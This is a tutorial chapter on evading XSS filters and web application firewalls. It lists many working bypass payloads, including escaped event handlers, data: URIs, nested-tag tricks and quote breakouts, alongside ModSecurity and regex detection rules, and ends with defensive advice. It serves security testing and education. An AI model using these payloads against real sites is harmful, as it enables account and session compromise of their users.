XSS Filter Evasion and WAF Bypassing Tactics
We will analyze various levels of evasion and bypassing tactics for XSS payloads.
Introduction
Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise trustworthy websites. The flaws that allow these attacks to succeed are common and can be found whenever a web application accepts user input in its output without verifying or encoding it.
Many security researchers have created guides and cheat sheets to aid security professionals in the testing of Cross-Site Scripting problems over the years. The most well-known is "XSS Filter Evasion Cheat Sheet," which was produced by RSnake and then donated to OWASP. Cure53's HTML5 Security Cheatsheet is another intriguing initiative.
In this book, we will not analyze the vectors reported in the cheat sheet one by one, but rather identify which of them are possible scenarios we may encounter and how to overcome them.
The most common scenarios you will come across are:
The XSS vector is blocked by the application or something else.
The XSS vector is sanitized.
The XSS vector is filtered or blocked by the browser.
We'll look at several evasion tactics to get around the weakest regulations and get effective XSS bypass vectors.
Bypassing Blacklisting Filters
Filters in blacklist mode are the most commonly used due to their ease of installation. Its mission is to identify specific patterns and prevent malicious behavior. It all comes down to "patterns," and the more accurate they are, the more frequently they will prevent attacks.
Script Code Injection
The tag is the primary method for executing client-side scripting code such as JavaScript.
Getting Around Weak Tag Baning
It is possible that the filters are weak and do not cover all possible cases, allowing them to be bypassed, The following are just a few examples of how to get around weak rules.
ModSecurity > Script Tag Based XSS Vectors Rule
For example, this is how ModSecurity filters the tag: SecRule ARGS "(?i)(<script[^>]*>[\s\S]*?<\/script[^>]*>|<script[^>]*>[\s\S]*?<\/script[[\s\S]]*[\s\S]|<script[^>]*>[\s\S]*?<\/script[\s]*[\s]|<script[^>]*>[\s\S]*?<\/script|<script[^>]*>[\s\S]*?)"
Obviously, this is not the only way to inject script code, There are several ways to run our code, such as different HTML tags and related event handlers.
Here's a small tool. https://github.com/evilcos/xss.swf
Events are how HTML DOM adds interactivity between a website and its visitors; this is accomplished simply by executing client-side code (e.g., JavaScript).
Almost all event handler identifiers begin with on and are followed by the event name. Onerror is one of the most commonly used: <img src=x onerror=alert(1)>
But, there are many other events.
Below are some HTML 4 tags examples:
Below are some HTML 5 tags examples:
From a defensive standpoint, the solution is to filter all events that begin with on in order to prevent this injection point from being used. This is a very common regex that you may come across: (on\w+\s=)
Thanks to a mix of HTML and browsers "dynamisms", we can easily bypass this first filter:
So, we have an "upgrade": (?i)([\s\"'
;\/0-9\=]+on\w+\s*=)`
But there is still an issue. Because some browsers convert the control character to space, the s meta-character alone is insufficient to cover all possible characters.
Here are some bypasses:
We have the first set of control characters that can be used between the event name attribute (for example, onload) and the equal sign (=) character, or just before the event name:
Browsers, on the other hand, are constantly evolving, so some of the permitted characters may no longer work. Gareth Heyes has created two fuzzer tests on Shazzer Fuzz DB:
• Characters are permitted after the attribute name.
• Characters may appear before the name of an attribute.
You can run it in your browser or view the results of previously scanned browsers.
To date, a valid regex rule should be the following:
Keyword Based Filters
Other challenges that a signature-based filter may provide include limiting the execution of scripting code by blocking the usage of particular keywords, such as alert, javascript, eval, and so on.
Let's have a look at several "alternatives" for getting around these types of filters.
Character Escaping
JavaScript has a number of character escape types that allow us to execute code rather than having it processed in its literal form. Let's pretend we need to get around a filter that prevents the alert keyword from being used in the following scenarios. For a moment, we're ignoring the fact that there are other options (see: prompt, confirm, etc.).
Character Escaping > Unicode
alert(1) Alert(1) <--- Blocked
Here we see Unicode escaping without using native functions:
We can also see here, Unicode escaping using native functions. Note, eval is just one of many:
Character Escaping > Decimal, Octal, Hexadecimal
If the filtered vector is within a string, in addition to Unicode, there are multiple escapes we may adopt:
eval('\141lert(1) ') <----- Octal escaping eval('\x61lert(1)') <----- Hexadecimal escaping
a <----- Hexadecimal Numeric Character a <------ Decimal NCR '\a\l\ert(1 <------ Superfluous Escapes Character
All character escaping can stay together! <img src=x onerror="\u0065val('\141\u006cert\(1)')"/>
Constructing Strings
In order to get around filters, you'll need to know how to build strings. The alert keyword, for example, is restricted as normal, but "ale"+"rt" is most likely not recognized. Let's have a look at some examples.
JavaScript has several functions useful to create strings. /ale/.source+/rt/.source String.fromCharCode(97,108,101,114,116) atob("YWxlcnQ=") 17795081..toString(36)
Execution Sinks
We've previously used the eval function to run code, as well as the events associated with various tags. Execution sinks are functions that parse a string into JavaScript code, and JavaScript provides various options, The reason we need to look at these functions is that if we can control one of them, we can run JavaScript code!
The following are just a few sinks; for a complete list, refer to the DOM XSS Wiki:
An interesting variation of the Function sink is: []. constructor.constructor(alert(1))
.[] <------ Object .constructor <------Array .constructor <------ Function (alert(1)) <------ XSS Vector
Pseudo-protocols
Javascript is a pseudo-protocol that refers to a "unofficial URI scheme." Invoking JavaScript code from within a link is useful. Most filters recognise the javascript keyword followed by a colon character as a frequent pattern: a href="javascript:alert(1)">
Note that javascript: isn't required for event handlers, thus we shouldn't use it. We can utilise all of the previous options because the pseudo-protocol is frequently introduced within a string.
Let’s check out some examples.
javascript <------ Blocked
In addition to javascript:, there are also data: (RFC 2397) and the Internet Explorer exclusive vbscript:.
Let’s see how they work.
Small data items provided with various media types can be included with the data URI scheme. This is how the structure looks like: data:[] [;base64],
Text/html and the base64 indicator, which allows us to encode our data, are the media types that we are most interested in. Let's have a look at some examples.
If javascript: is blocked:
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg== <----- Base64 Encoded
<embed code="data:text/html,<script>alert(1)</script>">
data: <------ Blocked If data: is blocked then use this:
Because it can only be used in Internet Explorer, the vbscript pseudo-protocol is not widely utilised, VBScript is no longer supported for the Internet zone in IE11 in Edge mode. Let's have a look at some scenarios.
To invoke VBScript, we may use vbscript:, as well as vbs:
Unlike JavaScript, the code is case insensitive until version 8, When the application alters the input, this is really handy. <iMg src=a onErRor="vBsCriPt:AlErT(4)"/>
If the vbscript: is blocked, we could use the usual encoding techniques:
Bypassing Sanitization
Rather than blocking the entire request, security systems frequently prefer to sanitise suspected XSS vectors. These are most likely the filters we'll come across during our experiments. The most frequent method is to HTML-encode some essential characters, such as (<), > (>), and so on. This isn't always enough, because it relies on where the untrusted data is inserted on the page.
String Manipulations
A filter may modify your vector in some cases by deleting dangerous phrases. Remove the tags, for example. The rule just removes the first instance of the matched expression, which is a common blunder with this behaviour.
Removing HTML Tags
For example, alert(1) is correctly sanitized to alert(1), but since the check is not performed recursively:<scr<script>ipt>alert(1)</script>
This could be a bypass!
If the filter runs recursive tests, you should always check to see if it is still exploitable. Changing the sequence of the inserted strings can help you.
Let's look at an example.
It's conceivable that the recursive tests are in order. They begin with the tag, then the next, and so on, without going back to the beginning to see whether there are any more dangerous strings.
The following vector could be a bypass: <scr<iframe>ipt>alert(1)</script>
Of course, if we know or can guess the sequence, we can generate more complex vectors and possibly employ several character encodings, as we saw in the section on Bypassing Blacklisting Filters.
It all relies on the filter we're dealing with.
Escaping Quotes
It's all about HTML tags, and the injection locations are frequently found inside quoted strings. To escape that type of character, filters commonly place the backslash character () before quotations.
To avoid bypasses, it's also necessary to escape the backslash. Consider the following code, in which we may control the value randomkey but the quotations are escaped: <script>var key = 'randomkey';</script>
Instead of randomkey, if we inject randomkey\' alert(1); // then we have a bypass.
This is because the application will escape the apostrophe transforming our input in randomkey\' alert(1); //. But this will escape only the backslash, allowing us to terminate the string and inject the alert code, One of useful Javascript methods is String.fromCharCode(). It allows us to generate strings starting from a sequence of Unicode values.
We could also play with the unescape method to escape a string generated. For example, we could escape a string with .source technique. unescape(/%78%u0073%73/.source)
Even if this feature has been deprecated, many browsers still support it.
In addition to this, there are decodeURI and decodeURIComponent methods. In this case, characters needs to be URL-encoded to avoid URI malformed errors.
These techniques would be handy if you can inject them into a script or event handler, but you can't use quotation marks because they're already escaped. Remember that each of them will return a string, therefore you'll need an execution sink to get the function to run (IE: eval).
How to Prevent Cross-Site Scripting in Your Applications
Filtering alone is clearly not the solution, with hundreds of ways to evade filters and new vectors sprouting all the time. Filters do not prevent XSS attacks; rather, they eliminate a small fraction of code patterns that could be used in an attack. In fact, instead of blocking malicious code, filtering solves the wrong problem by attempting to prevent any calls that load bad code itself. Developers may have significantly more influence on application and user security than any filters by developing secure code that is not vulnerable to XSS attacks. This can be accomplished at the application level by using context-sensitive escaping and encoding appropriately. The usage of appropriate HTTP security headers on the HTTP protocol level is the major weapon against Cross-Site Scripting.
Thank you for reading my Book; if you have any suggestions, Here is my Twitter handle @N3T_hunt3r Feel free to reach me :)
Thanks,
Yasser Khan
Last updated